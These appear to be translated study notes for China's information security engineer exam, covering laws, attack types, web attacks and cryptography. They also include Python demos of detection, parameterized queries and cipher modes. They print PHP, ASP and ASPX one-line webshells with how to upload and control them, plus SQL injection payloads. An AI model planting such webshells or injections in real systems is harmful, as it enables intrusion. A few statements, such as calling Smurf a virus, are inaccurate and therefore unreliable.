Summary of the second edition of the Soft Exam Information Security Engineer with notes and things to remember in each chapter (this is enough for the exam)

1. (Key Points) 1. Basic attributes of network information security (basic goals) CIA:
Confidentiality: Network information data is not allowed to be leaked or stolen during the transmission process.
Integrity: Network information data is not allowed to be tampered with during transmission.
Availability: Network information data must be available in a timely manner under authorized conditions.

Non-repudiation: Preventing users of network information from denying their actions.
Controllability: Able to manage and control information networks under authorized conditions.

  1. Authenticity
    Authenticity refers to the consistency between cyberspace information and objective facts in actual physical space and social space. For example, online
    rumor information does not conform to the real situation and violates objective facts.

  2. Timeliness
    Timeliness refers to the ability of cyberspace information, services and systems to meet time constraints. For example, the intelligent
    control system for safe driving of automobiles requires real-time information, and the information is only valid within a specified time range.

  3. Compliance
    Compliance means that network information, services and systems comply with laws, regulations, policies, standards and specifications. For example, online content
    complies with laws, regulations and policies.

  4. Fairness
    Fairness refers to the characteristic requirement that relevant entities of a network information system handle related tasks on equal footing, without any party having an advantage.
    For example, both parties to an electronic contract meet the fairness requirements and sign the contract at the same time.

  5. Reliability
    Reliability refers to the characteristics of a network information system that can effectively complete predetermined system functions under specified conditions and time.

  6. Survivability
    Survivability refers to the security features of a network information system that can provide minimal and necessary service functions to support the
    continued operation of business when security is compromised.

Information security is divided into four levels:
device security, data security, content security and behavioral security, among which data security is the traditional form of information security.

General theoretical basis of information security: information theory, cybernetics, and system theory.
Theoretical basis unique to information security: cryptography, access control theory, game theory.

Information security management system: (dense network personnel)
password management, network management, equipment management, personnel management.

Network management system: (for table security)
objects, representations, security, protocols.

TOR onion routing does not have a fixed proxy server. Tor proxies are generally on layers 2-5.

Hamming code is a multiple-parity error detection system with both error detection and error correction functions. Its code distance is greater than or equal to 3. The cyclic redundancy check (CRC) can only detect errors, not correct them. It can detect r-bit errors, so its code distance is greater than 1.

The "Cybersecurity Review Measures" were reviewed and adopted at the 20th office meeting of the Cyberspace Administration of China on November 16, 2021. With the consent of the National Development and Reform Commission, the Ministry of Industry and Information Technology, the Ministry of Public Security, the Ministry of National Security, the Ministry of Finance, the Ministry of Industry and Commerce, the Ministry of Commerce, the People's Bank of China, the State Administration for Market Regulation, the State Administration of Radio and Television, the China Securities Regulatory Commission, the State Administration of Secrecy, and the State Cryptography Administration, they are hereby announced and will come into effect on February 15, 2022.

Network Infrastructure Law: Starting on September 7, 2022

The National Computer Network Emergency Response Technology Coordination Center (referred to as the "National Internet Emergency Response Center"; the English abbreviation is
CNCERT or CNCERT/CC) is the leading unit in China's computer network emergency response system and a national emergency center.
The center was established in September 2002 as a non-governmental, non-profit network security technical coordination organization. It is a national cybersecurity emergency agency under the leadership of the Office of the Central Cybersecurity and Information Technology Commission. As a national emergency center, CNCERT’s main responsibilities are: in accordance with the policy of “active prevention, timely detection, rapid response, and ensuring recovery”

Under the overall coordination of the Central Cyberspace Administration of China, the Cybersecurity and Informatization Leading Group of the Ministry of Industry and Information Technology leads the emergency management of public Internet network security emergencies and is responsible for the unified command and coordination of particularly major public Internet network security emergencies.
The national cybersecurity and informatization department coordinates relevant departments to establish and improve cybersecurity risk assessment and emergency response mechanisms, formulate
contingency plans for cybersecurity incidents, and organize regular drills.

In 2017, the Cyberspace Administration of China issued the "National Cyber Security Incident Emergency Plan", which classified network information security incidents into 7 basic categories: malicious program incidents, network attack incidents, information destruction incidents, information content security incidents, equipment and facility failures, catastrophic incidents and other information security incidents.
According to the degree of impact of cyber security incidents on national security, social order, economic construction and public interests, cyber
security incidents can be divided into four levels: particularly major, major, relatively major and general cyber security incidents.
According to the scope of social impact and degree of harm, public Internet network security emergencies are divided into four levels: particularly major incidents,
major incidents, relatively major incidents, and general incidents.
3.1 Particularly major incidents
A particularly major network security incident meets one of the following circumstances:
(1) A large number of Internet users across the country are unable to access the Internet normally;
(2) The resolution efficiency of the .CN national top-level domain name system drops significantly;
(3) Information leakage of more than 100 million Internet users;
(4) Large-scale outbreak of network viruses across the country;
(5) Other network security incidents that cause or may cause particularly significant harm or impact.
3.2 Major incidents
A major network security incident meets one of the following circumstances:
(1) A large number of Internet users in multiple provinces are unable to access the Internet normally;
(2) There are serious abnormalities in access to influential websites or platforms across the country;
(3) Serious abnormalities in access to large-scale domain name resolution systems;
(4) Information leakage of more than 10 million Internet users;
(5) Large-scale outbreaks of network viruses in multiple provinces;
(6) Other network security incidents that cause or may cause major harm or impact.
3.3 Relatively major incidents
A relatively major network security incident meets one of the following circumstances:
(1) A large number of Internet users in a province cannot access the Internet normally;
(2) There are serious abnormalities in access to influential websites or platforms in the province;
(3) Information leakage of more than 1 million Internet users;
(4) Large-scale outbreak of network viruses within a province;
(5) Other network security incidents that cause or may cause greater harm or impact.
3.4 General incidents
If any of the following situations are met, it is a general network security incident:
(1) A large number of Internet users in one city cannot access the Internet normally;
(2) More than 100,000 Internet users’ information is leaked;
(3) Other network security incidents that cause or may cause general harm or impact.

The China Cybersecurity Review Technology and Certification Center (CCRC, formerly the China Information Security Certification Center) is a
specialized agency responsible for implementing network security review and certification.

The "Regulations on the Management of Commercial Cryptography" promulgated and implemented by the State Council in 1999 stipulates: "Commercial cryptography as mentioned in these regulations
refers to the cryptography technology and cryptography products used for encryption protection or security authentication of information that does not involve state secrets."

The "Cryptography Law of the People's Republic of China" clearly stipulates that cryptography is divided into core cryptography, ordinary cryptography and commercial cryptography, and that classified management is implemented. Core cryptography and ordinary cryptography are used to protect state secret information, are themselves state secrets, and are strictly and uniformly managed by the cryptography administration department in accordance with the law.

Personal information and business data collected during the provision of services shall be stored and used in mainland China, with a retention period of no less than 2 years; unless otherwise provided by laws and regulations, personal information and business data shall not be leaked out.

The basic technical requirements for network information security
include network physical environment security, network information security authentication, access control, security and confidentiality, vulnerability scanning, malicious code protection, network information content security, security monitoring and early warning, emergency response, etc.

Network security management methods mainly include risk management, graded protection, defense in depth, layered protection, emergency response and the PDCA (Plan-Do-Check-Act) method.

The information standard system consists of five levels of standards:
international standards, national standards, industry standards, local standards and enterprise standards.

2. Basic functions of network information security:
defense, monitoring, emergency response, and recovery.

3. Network information security management elements:
network management objects, network threats, network vulnerabilities, network risks, and network protection measures.

Communication hiding technology:
port customization technology,
port reuse technology,
communication encryption technology,
covert channel technology

4. Network information security risk control methods:
avoid risks, transfer network risks, reduce threats, eliminate vulnerabilities, and monitor risks.


5. Network information security management process:
Determine network information security management objects.
Evaluate the value of network information security objects.
Identify threats to network information security objects.
Identify the vulnerabilities of network information security objects.
Determine the risk level of network information security objects.
Develop a network information security defense system.
Implement network security management plans.
Operate, maintain and manage the network.

2 (key points), 1. Network attack model:
Attack tree model: an AND-OR tree structure used to analyze security threats against a target; nodes can be added without changing the original nodes. It is used by the red team for penetration testing and by the blue team for defense. The model can integrate the opinions of multiple people into the attack tree and can model complex attack scenarios. It cannot be used to model multiple attempted attacks, and it cannot model cyclic events.

MITRE ATT&CK model: a data model extracted from real network attack data that provides specific implementation methods of attack activities; used for penetration testing and network threat intelligence collection.

Network kill chain model (kill chain):
target reconnaissance,
weapon construction,
payload delivery,
vulnerability exploitation,
installation and implantation,
command and control,
target action

There are four basic types of common harmful behaviors of network attacks:
information leakage attacks,
integrity destruction attacks,
denial of service attacks, and
illegal use attacks.

2. General attack process:
hide the attack source,
collect target information,
mine target vulnerability information,
obtain target access rights,
hide attack behavior,
implement the attack,
open a backdoor,
clear attack traces

Password cracking:
Establish a network connection with the target network service;
select a user list file and a dictionary file;
select a user name and password from the user list file and dictionary file and, following the network service protocol, send the user
name and password to the target network service port;
check the information returned by the remote service to determine whether the password attempt succeeded;
then take another user name and password and repeat the test until the user list file and dictionary file are exhausted.

Prevention strategies for buffer overflow attacks:
Prevention strategies for system management:
shut down unnecessary privileged services; patch program vulnerabilities in a timely manner.
Precautionary strategies during software development:
write correct code; buffers are not executable; improve C language function libraries.
Vulnerability prevention technology:
address space randomization technology; data execution blocking; stack protection.

Common types of malicious code include computer viruses, network worms, Trojan horses, backdoors, logic bombs, botnets,
etc.

W32.Blaster.Worm is a network worm that propagates by exploiting DCOM RPC vulnerabilities, and its propagation ability is very strong.
Computer systems infected with the worm run unstably and restart constantly. The worm also performs a denial of service attack on windowsupdate.com, preventing victims from obtaining the patch for this vulnerability in a timely manner.
(1) Create a mutex named BILLY. If this mutex already exists, the worm abandons the infection and exits.
(2) Add the key value "windows auto update"="msblast.exe" to the registry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
This allows the worm to run automatically when the system restarts.
(3) The worm generates a list of attack IP addresses and attempts to infect the computers in the list. It initiates a
connection to TCP port 135 on machines with the DCOM RPC vulnerability to infect them.
(4) Bind a cmd.exe backdoor to TCP port 4444.
(5) Listen on UDP port 69. If a request is received, Msblast.exe is sent to the target machine.
(6) Send a command to the remote machine so that it contacts the infected machine and downloads Msblast.exe.
(7) Check the current day and month. If the current day is the 16th or later, or the current month is between September and December,
W32.Blaster.Worm launches a TCP SYN flood denial of service attack on windowsupdate.com.


DOS attack classification:
Teardrop attack is a denial of service attack based on pathological fragmentation of UDP packets. In English, "tear" means "tears" and "drop" means "dropping"; as the name suggests, the Teardrop attack is an attack that makes the victim shed tears, which shows how destructive it is.
It mainly targets early Microsoft operating systems (95, 98, 3.x, NT). In recent years, some people have found the attack to be effective against Android 2.x and iOS 6.0.
Attack effect: the attacked system shows a blue screen, restarts, freezes, etc.
Principle of the Teardrop attack:
Attacker A sends fragmented IP packets to victim B and deliberately sets the "13-bit fragment offset" field to an incorrect value (it can overlap with the data of the previous fragment, or leave a gap). When B reassembles such forged fragments containing overlapping offsets, some operating systems crash or restart.

A WinNuke attack is a denial of service attack, also called an out-of-band transmission attack. It is characterized by the target port it attacks: the attacked ports are usually 139, 138, 137, 113 and 53, and the URG bit is set to "1", i.e. urgent mode.
Countermeasure: properly configured firewall equipment or filtering routers can prevent this attack (drop the packet) and audit it (record the time of the event and the MAC addresses and IP addresses of the source host and target host).

LAND attack (Local Area Network Denial attack) is a type of denial of service (DoS) attack that sends carefully constructed spoofed packets with the same source address and destination address, paralyzing target devices that lack corresponding protection mechanisms. This attack method was first proposed in 1997 by someone under the name "m3lt", and reappeared many years later in operating systems such as Windows Server 2003 and Windows XP SP2.
The attack uses specially constructed TCP SYN packets (normally used to open a new connection) that make the target machine open an empty connection whose source and destination addresses are both its own IP address; the machine keeps responding to itself, consuming system resources until it crashes. This attack method is not the same as the SYN flood attack.
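
Added example (not part of the original notes): detection logic in Python for the three packet signatures described above, namely overlapping fragment offsets (Teardrop), the URG bit sent to ports 139/138/137/113/53 (WinNuke), and a TCP SYN whose source and destination address are identical (LAND). The packets are constructed in memory from documentation-range addresses and are never sent; the names build_ip, build_tcp and DosDetector are hypothetical.

```python
import socket
import struct

WINNUKE_PORTS = {139, 138, 137, 113, 53}      # target ports listed in the notes
IP_FMT, TCP_FMT = "!BBHHHBBH4s4s", "!HHIIBBHHH"

def build_ip(src, dst, proto, payload, ident=1, mf=False, offset=0):
    """Constructed test packet: 20-byte IPv4 header + payload (checksum left 0)."""
    frag = (0x2000 if mf else 0) | (offset // 8)   # MF flag + 13-bit fragment offset
    return struct.pack(IP_FMT, 0x45, 0, 20 + len(payload), ident, frag, 64,
                       proto, 0, socket.inet_aton(src), socket.inet_aton(dst)) + payload

def build_tcp(sport, dport, flags):
    """Constructed 20-byte TCP header. Flag bits: SYN=0x02, ACK=0x10, URG=0x20."""
    return struct.pack(TCP_FMT, sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)

def parse(pkt):
    """Extract the header fields the three checks need."""
    ver_ihl, _, total, ident, frag, _, proto, _, src, dst = struct.unpack(IP_FMT, pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    p = {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "proto": proto,
         "id": ident, "mf": bool(frag & 0x2000), "offset": (frag & 0x1FFF) * 8,
         "len": total - ihl, "tcp": None}
    # The TCP header is only present in the first fragment (offset 0).
    if proto == 6 and p["offset"] == 0 and len(pkt) >= ihl + 20:
        sport, dport, _, _, _, flags, _, _, _ = struct.unpack(TCP_FMT, pkt[ihl:ihl + 20])
        p["tcp"] = {"sport": sport, "dport": dport, "flags": flags}
    return p

class DosDetector:
    def __init__(self):
        self.frags = {}   # (src, dst, proto, id) -> byte ranges already seen

    def inspect(self, pkt):
        p, alerts = parse(pkt), []
        tcp = p["tcp"]
        # LAND: SYN packet whose source address equals its destination address.
        if tcp and tcp["flags"] & 0x02 and p["src"] == p["dst"]:
            alerts.append("LAND")
        # WinNuke: URG bit set on a packet to one of the listed ports.
        if tcp and tcp["flags"] & 0x20 and tcp["dport"] in WINNUKE_PORTS:
            alerts.append("WinNuke")
        # Teardrop: a fragment whose byte range overlaps an earlier fragment.
        if p["mf"] or p["offset"] > 0:
            key = (p["src"], p["dst"], p["proto"], p["id"])
            start, end = p["offset"], p["offset"] + p["len"]
            seen = self.frags.setdefault(key, [])
            if any(start < e and s < end for s, e in seen):
                alerts.append("Teardrop")
            seen.append((start, end))
        return alerts

def run_samples():
    """Run the detector over constructed sample packets; one alert list per packet."""
    victim, peer = "192.0.2.10", "198.51.100.7"
    samples = [
        build_ip(peer, victim, 6, build_tcp(40000, 80, 0x02)),          # normal SYN
        build_ip(victim, victim, 6, build_tcp(80, 80, 0x02)),           # src == dst
        build_ip(peer, victim, 6, build_tcp(40001, 139, 0x20 | 0x10)),  # URG to 139
        build_ip(peer, victim, 17, b"A" * 24, ident=78, mf=True),       # bytes 0-23
        build_ip(peer, victim, 17, b"B" * 8, ident=78, offset=24),      # bytes 24-31
        build_ip(peer, victim, 17, b"A" * 36, ident=77, mf=True),       # bytes 0-35
        build_ip(peer, victim, 17, b"B" * 4, ident=77, offset=24),      # overlaps 24-27
    ]
    detector = DosDetector()
    return [detector.inspect(pkt) for pkt in samples]

if __name__ == "__main__":
    for alerts in run_samples():
        print(alerts or "ok")
```

The same three conditions are what a firewall or filtering router rule matches when it drops and logs these packets.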

Smurf attack is a virus attack, named after the program "Smurf" that originally launched this attack. It combines IP spoofing with ICMP replies to flood the target system with a large volume of network traffic, causing the target system to deny service to normal systems.
A Smurf attack works by flooding the victim host with ICMP echo request (ping) packets whose reply address is set to the broadcast address of the victim network, so that eventually all hosts on the network reply to the ICMP echo request, causing network congestion. More sophisticated Smurf attacks change the source address to a third-party victim, eventually causing the third party to crash.

3. DDoS attack steps:
Scan a large number of hosts to find hosts that can be attacked.
Attack a vulnerable host and gain control.
Install the client program on the compromised host.
Use the compromised hosts to scan and attack other hosts.
When the number of compromised hosts reaches a certain level, the master control terminal directs these hosts to attack the specific target host.


Common network eavesdropping techniques mainly include: network sniffing and man-in-the-middle attacks.

SQL injection (numeric injection and character injection)
(1) SQL injection principle
• Web services generally adopt a three-layer architecture model: browser + web server + database. Because of
programming vulnerabilities in web service scripts, an attacker can insert SQL commands into the input fields of web forms or into the query strings of page
requests to trick the server into executing malicious SQL commands.
(2) Injection form
• http://xxx.xxx.xxx/abc.asp?p=YY
• Perform injection: http://xxx.xxx.xxx/abc.asp?p=YY and user>0 The user name can be obtained from the error message returned.
• Perform injection: http://xxx.xxx.xxx/abc.asp?p=YY and (Select password from login
where user_name='admin')>0 The password can be obtained from the error message returned.

SQL injection defense: use SQL precompilation; in PHP, the precompiled statement is created with prepare.
Example injection input: 1' or '1'='1
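
Added example (not part of the original notes): the character and numeric injection cases next to their precompiled (parameterized) forms, using Python's sqlite3 module in place of PHP's prepare so that it runs stand-alone. The login table, its rows, the function names and the numeric input "0 or 1=1" are constructed for the demonstration.

```python
import sqlite3

def make_db():
    """In-memory database with a constructed login table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER, user_name TEXT, password TEXT)")
    db.executemany("INSERT INTO login VALUES (?, ?, ?)",
                   [(1, "admin", "constructed-a"),
                    (2, "alice", "constructed-b"),
                    (3, "bob", "constructed-c")])
    return db

def by_name_vulnerable(db, name):
    # Character injection: the input is pasted inside the quotes of the SQL text,
    # so a quote in the input ends the string and the rest is parsed as SQL.
    sql = "SELECT id FROM login WHERE user_name = '" + name + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def by_name_prepared(db, name):
    # Precompiled statement: the SQL text is fixed, the input is bound as data.
    sql = "SELECT id FROM login WHERE user_name = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (name,))]

def by_id_vulnerable(db, p):
    # Numeric injection: no quotes are needed to break out of the value.
    sql = "SELECT user_name FROM login WHERE id = " + p + " ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def by_id_prepared(db, p):
    # Validate the type first (raises ValueError on non-numeric input), then bind.
    sql = "SELECT user_name FROM login WHERE id = ? ORDER BY id"
    return [row[0] for row in db.execute(sql, (int(p),))]

if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print(by_name_vulnerable(db, payload))   # every row matches
    print(by_name_prepared(db, payload))     # no user has that literal name
    print(by_id_vulnerable(db, "0 or 1=1"))  # every row matches
    try:
        by_id_prepared(db, "0 or 1=1")
    except ValueError as err:
        print("rejected:", err)
```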

One-sentence Trojan principle
PHP’s one-sentence Trojan: <?php @eval($_POST(cmd);?>
One sentence of asp is: <%eval request (“pass”)%>
One sentence of aspx is: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>

By exploiting a file upload vulnerability to upload a one-sentence Trojan to the target website, the entire website directory can then be obtained and controlled locally through chopper.exe.
@ means that even if a later error occurs during execution, no error is reported. The eval() function executes the statement string in its parentheses as code. $_POST['attack'] reads the value of the attack parameter submitted by the page.

The invasion can be successful if the following three conditions are met:
(1) The Trojan is successfully uploaded and has not been killed;
(2) The path of the Trojan is known;
(3) The uploaded Trojan can run normally.


CSRF cross-site request forgery attack:
Defense: prefer POST, add a verification code, verify the Referer, use a token, add a custom header.

XSS hazards:
planting malicious code in web pages (web page hanging), cookie theft, DDoS attacks on client browsers, phishing attacks, hijacking of user web behavior, outbreaks of Web 2.0 worms.

XSS prevention: filter input, encode output, set cookies to HttpOnly, convert angle brackets to &gt; and &lt;, use an escape library in JS.

3 (Key Points) Cryptography
Modern cryptography holds that a cipher is acceptable only if it can withstand known-plaintext attacks.

Article 1 This law is formulated to regulate the application and management of cryptography, promote the development of cryptography, ensure network and information security, safeguard national security and social public interests, and protect the legitimate rights and interests of citizens, legal persons and other organizations.

Article 2 The term "cryptography" as used in this Law refers to technologies, products and services that use specific transformation methods to encrypt, protect and authenticate information.

Article 3 Cryptography work adheres to the overall national security concept, follows the principles of unified leadership, hierarchical responsibilities, innovative development, serving the overall situation, and management in accordance with the law to ensure security.

Article 4: Uphold the leadership of the Communist Party of China over cryptography work. The central leadership body for cryptography exercises unified leadership over national cryptography work, formulates major national cryptography work guidelines and policies, coordinates major national cryptography matters and important work, and promotes the construction of the national cryptography rule of law.

Article 5 The national cryptography management department is responsible for managing cryptography work nationwide. Local cryptography management departments at or above the county level are responsible for managing cryptography work in their respective administrative regions.

State agencies and units involved in cryptography work are responsible for the cryptography work of their own agencies, units or systems within the scope of their duties.

Article 6 The state implements classified management of cryptography.

Article 15 of the "Law of the People's Republic of China on Guarding State Secrets": The period for keeping state secrets secret shall be limited to a necessary period based on the nature and characteristics of the matter and the need to safeguard national security and interests; if the period cannot be determined, the conditions for declassification shall be determined. Unless otherwise specified, the confidentiality period of state secrets shall not exceed thirty years at the top secret level and twenty years at the confidential level.

Computer information systems involving state secrets must not be directly or indirectly connected to the Internet or other public information networks, and must be physically isolated.

Cryptography is divided into core cryptography, ordinary cryptography and commercial cryptography.

Measuring the security of a cryptographic system:
Practical security (computational security): it cannot be cracked with existing computing resources and capabilities.
Theoretical security (provable security): it is based on a hard mathematical problem.
Ultimate security (unconditional security): it cannot be cracked even with enough computation and time.

The SET protocol mainly defines:
encryption algorithm application,
certificate message,
purchase message,
payment message,
participant message

1. Cryptography (the design of ciphers) and cryptanalysis together constitute cryptology.

2. According to the prerequisites that cryptanalysts have when deciphering, cryptanalysis attacks are usually divided into five types.
Ciphertext-only attack: the least favorable to the attacker.
Known-plaintext attack: attacks through pairs of plaintext and ciphertext.
Chosen-plaintext attack: attacks computer systems and files.
Chosen-ciphertext attack: attacks public key cryptography and digital signatures.
Ciphertext verification attack.

The five types of cryptanalysis attack are described below.
(1) Ciphertext-only attack. The cryptanalyst only has one or more
ciphertexts encrypted with the same key and no other information available.
(2) Known-plaintext attack. The cryptanalyst only knows some plaintext
and the corresponding ciphertext under the current key.
(3) Chosen-plaintext attack. The cryptanalyst can obtain
the ciphertext corresponding to plaintext of their own choosing under the current key.
(4) Ciphertext verification attack. For any selected ciphertext, the cryptanalyst
can determine whether the ciphertext is legal or not.
(5) Chosen-ciphertext attack. Apart from the challenge ciphertext, the cryptanalyst can obtain
the plaintext corresponding to any chosen ciphertext.

Differential analysis is a chosen-plaintext attack.

Quantum algorithms include Shor and Grover, which can effectively attack RSA, elliptic curve, and DH.

There are three main methods for cryptanalysts to attack ciphers: exhaustive attacks, mathematical analysis attacks, and physics-based attacks.

To prevent replay attacks: add timestamps, verification codes, one-time passwords, and random values (random values must satisfy unpredictability and randomness).

Man-in-the-middle attack prevention: Two-way authentication of the identity of the sender and receiver, using a hash function.
The DH key exchange protocol is vulnerable to man-in-the-middle attacks.

Differential attack: select plaintexts with a certain difference (known plaintext attack); after they pass through the cryptosystem, the corresponding ciphertexts have a specific difference, from which the key is obtained. It is mainly aimed at DES, and DES can defend against it through its S-box design.
Differential attacks attack cryptographic algorithms by comparing and analyzing how changes in the plaintext propagate through encryption. Differential attack is an attack method proposed against symmetric block encryption algorithms. It seems to be the most effective method of attacking DES ("seems" because a differential attack requires a great deal of space, and in practice may be less feasible than a brute-force attack). Before 2000, differential attacks were proven to be effective for one cycle of MD5, but it seemed difficult to make them work for all four cycles. But with the progress of research on MD5, the situation has changed.

Linear attack: It is a known plaintext attack method. By finding an effective linear expression between plaintext and ciphertext, the block cipher is distinguished from random substitutions, and the key is recovered.

3. Cryptosystem classification:
private key cryptography,
public key cryptography,
hybrid cryptography

4. Encryption algorithms (protection against theft and eavesdropping): symmetric and asymmetric.

Block cipher working mode:
1. Electronic codebook mode (ECB) is generally only suitable for protecting small amounts of character data, such as key protection. It easily exposes patterns in the plaintext data and is difficult to defend against statistical analysis attacks. It can be encrypted in parallel. Encryption and decryption error propagation is bounded.

2. CBC mode (cipher block chaining mode) is suitable for transmitting long messages and is the standard for SSL and IPSec.
CBC has two modes: plaintext chaining mode and ciphertext chaining mode. In
plaintext chaining mode, encryption and decryption error propagation is unbounded;
in ciphertext chaining mode, encryption error propagation is unbounded and decryption error propagation is bounded.
It cannot be encrypted in parallel and can resist replay attacks.

3. CFB, also called cipher feedback mode, is suitable for data integrity authentication; encryption and decryption error propagation is unbounded.

4. OFB, also called output feedback mode: encryption and decryption error propagation is bounded. It can encrypt data of any length, such as images and voice, and bit errors do not propagate.

5. CTR counter mode: encryption and decryption error propagation is bounded; not suitable for data integrity authentication; suitable for random-access encryption of computer files.
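
Added example (not part of the original notes): a Python check of the ECB, CBC (ciphertext chaining) and OFB properties listed above, measuring which blocks are damaged by a single flipped bit and whether repeated plaintext blocks stay visible. The block cipher is a toy 16-round Feistel network with a 64-bit block built for this demonstration, not DES; the key, IV and plaintext are constructed.

```python
import hashlib

BLOCK = 8                       # 64-bit block, the same block size DES uses
KEY = b"constructed demo key"   # constructed values for the demonstration
IV = bytes(range(8))
PT = b"SAMEBLK!" + b"SAMEBLK!" + b"block-02" + b"block-03" + b"SAMEBLK!"

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(block, rounds):
    # Toy Feistel network; F is a truncated SHA-256, not DES's E / S-box / P.
    left, right = block[:4], block[4:]
    for i in rounds:
        f = hashlib.sha256(KEY + bytes([i]) + right).digest()[:4]
        left, right = right, xor(left, f)
    return right + left         # final swap of the two halves

def enc_block(b): return feistel(b, range(16))
def dec_block(b): return feistel(b, reversed(range(16)))  # same network, keys reversed

def blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def ecb(data, decrypt=False):
    f = dec_block if decrypt else enc_block
    return b"".join(f(b) for b in blocks(data))

def cbc_encrypt(pt):
    out, prev = [], IV
    for b in blocks(pt):
        prev = enc_block(xor(b, prev))   # chain on the previous ciphertext block
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(ct):
    out, prev = [], IV
    for c in blocks(ct):
        out.append(xor(dec_block(c), prev))
        prev = c
    return b"".join(out)

def ofb(data):
    # The keystream depends only on key and IV, so the same call encrypts and decrypts.
    out, state = [], IV
    for b in blocks(data):
        state = enc_block(state)
        out.append(xor(b, state))
    return b"".join(out)

def flip_bit(data, index):
    out = bytearray(data)
    out[index] ^= 0x01
    return bytes(out)

def changed(a, b):
    """Indexes of the blocks that differ between a and b."""
    return [i for i, (x, y) in enumerate(zip(blocks(a), blocks(b))) if x != y]

def repeated_blocks_visible(ct):
    c = blocks(ct)
    return len(set(c)) < len(c)

def decrypt_damage():
    """One bit flipped in ciphertext block 1: which plaintext blocks are wrong?"""
    return {"ECB": changed(PT, ecb(flip_bit(ecb(PT), BLOCK), decrypt=True)),
            "CBC": changed(PT, cbc_decrypt(flip_bit(cbc_encrypt(PT), BLOCK))),
            "OFB": changed(PT, ofb(flip_bit(ofb(PT), BLOCK)))}

def encrypt_damage():
    """One bit flipped in plaintext block 1: which ciphertext blocks change?"""
    bad = flip_bit(PT, BLOCK)
    return {"ECB": changed(ecb(PT), ecb(bad)),
            "CBC": changed(cbc_encrypt(PT), cbc_encrypt(bad)),
            "OFB": changed(ofb(PT), ofb(bad))}

if __name__ == "__main__":
    print("ECB repeats visible:", repeated_blocks_visible(ecb(PT)))
    print("CBC repeats visible:", repeated_blocks_visible(cbc_encrypt(PT)))
    print("decrypt damage:", decrypt_damage())
    print("encrypt damage:", encrypt_damage())
```

In OFB the damaged block differs from the original in exactly the flipped bit, while in ECB and CBC the block that passes through the block cipher is garbled as a whole.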

Symmetric:
DES: the initial key is 64 bits; excluding parity bits, the actual available bits are 56 bits; then 48 bits after 2 bits left rotation; the data block length is 64 bits.
The effective key length of DES is 56 bits, the data block length is 64 bits, the subkey length is 48 bits, the output of function F is 32 bits, and there are 16 rounds of encryption, each using a 48-bit round key.
The DES key is short, only 2 to the power of 56 possibilities, and there are weak keys and semi-weak keys: 4 weak keys and 12 semi-weak keys.
DES algorithm process:
initial permutation IP, generation of 16 48-bit subkeys, 16 rounds of Feistel iteration (expansion permutation E, S-box lookup, permutation P), inverse initial permutation IP-1.
1. Initial permutation IP (for hexadecimal plaintext, each digit is converted to 4 binary bits, then converted to decimal, and then filled in according to the initial permutation IP table. The upper half of the table is Li and the lower half is Ri):

2. Generate 16 48-bit subkeys

3. 16 rounds of Feistel structure iteration (expansion permutation E, S-box substitution, permutation P)

4. Inverse initial permutation IP-1. Finally, the left and right halves are swapped, with R on the left and L on the right.

3DES: three 56-bit DES keys, 168 bits in total; the effective key is 112 bits.
Encryption process: encrypt-decrypt-encrypt.
Decryption is the reverse: decrypt-encrypt-decrypt.
3DES is relatively slow to implement in software
and can resist exhaustive attacks.

On October 25, 1999, NIST adopted Triple DES (Triple Data Encryption Algorithm, TDEA) as the national standard for the transitional period to enhance the security of DES, and began to solicit AES (Advanced Encryption Standard) algorithms. The TDEA algorithm works by using DES to perform an "encrypt-decrypt-encrypt" operation on the plaintext, that is, the DES-encrypted ciphertext is decrypted and then encrypted again; decryption does the opposite.

WEP wireless encryption uses a static key; the standard 64-bit WEP has a key length of 40 bits and an initialization vector of 24 bits.

The state stipulates that the wireless key negotiation algorithm uses ECDH.

Signature algorithm: ECDSA.

National wireless security standard WAPI:
key management is based on certificates and pre-shared keys (PSK).

International wireless security WPKI:
optimized elliptic curve cryptography and compressed X.509.
The key management methods of WAPI include certificate-based and pre-shared key-based methods.

WPKI (Wireless Public Key System) is a key and certificate management platform that follows established standards and is based on the wireless network environment. The encryption algorithm used by the platform is an optimized elliptic curve encryption algorithm.

WSN is a wireless network with constrained nodes; it provides the lightweight link data encryption algorithm TinySec. The encryption algorithm can be RC5 or Skipjack, and the encryption mode of operation is CBC (a feedback mechanism).

The media access control sublayer of WSN is vulnerable to denial of service attacks. Wormhole attacks usually involve more than two malicious nodes cooperating to launch the attack. Sequence ciphers and block ciphers are combined to achieve security.

AES: the block length is 128 bits, and the key length is 128, 192 or 256 bits. AES is composed of four different modules; the non-linear byte substitution is applied byte by byte using the S-box.

AES has no weak keys.
It can resist exhaustive attacks. The key spaces are 2 to the power of 128, 192 and 256, likened to the grains of sand on the earth.
It can resist linear attacks. After 4 rounds of transformation, linear attacks are powerless.
It can resist differential attacks. After 8-bit transformation, differential attacks are powerless.
Rijndael's data length and key length are variable and can be adapted to different environments.

AES encryption algorithm steps: an initial round key addition, Nr-1 rounds of the standard round function, and a non-standard round function in the last round, which has no MixColumns (column mixing) transformation.

AES uses a permutation round function and an SP structure:
1. Nonlinear layer: S-box transformation, providing confusion,
2. Linear mixing layer: providing diffusion,
3. Key addition layer.

WPA2-PSK is suitable for personal home networks and supports both TKIP and AES encryption methods. It
uses the TKIP protocol to solve the security issues in the WEP protocol.

AES's byte substitution S-box:
The box is a square table of 16*16 bytes, containing the 256 possible transformations of an 8-bit value.
Example: suppose the current state is: 51 67 -------- In the S-box lookup, the first digit of each byte is the row and the second digit is the column, and the intersection is the result: for 51 the row is 5x and the column is x1, so 51 maps to d1 and 67 maps to 85.
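The lookup described above, as an added example that is not part of the original notes: it generates the 16*16 AES S-box from its algebraic definition (inverse in GF(2^8) followed by the affine transform) instead of copying the table, then indexes it by row and column nibble. Function names are chosen here for illustration.

```python
"""AES SubBytes: build the 16x16 S-box and look bytes up by row/column nibble."""

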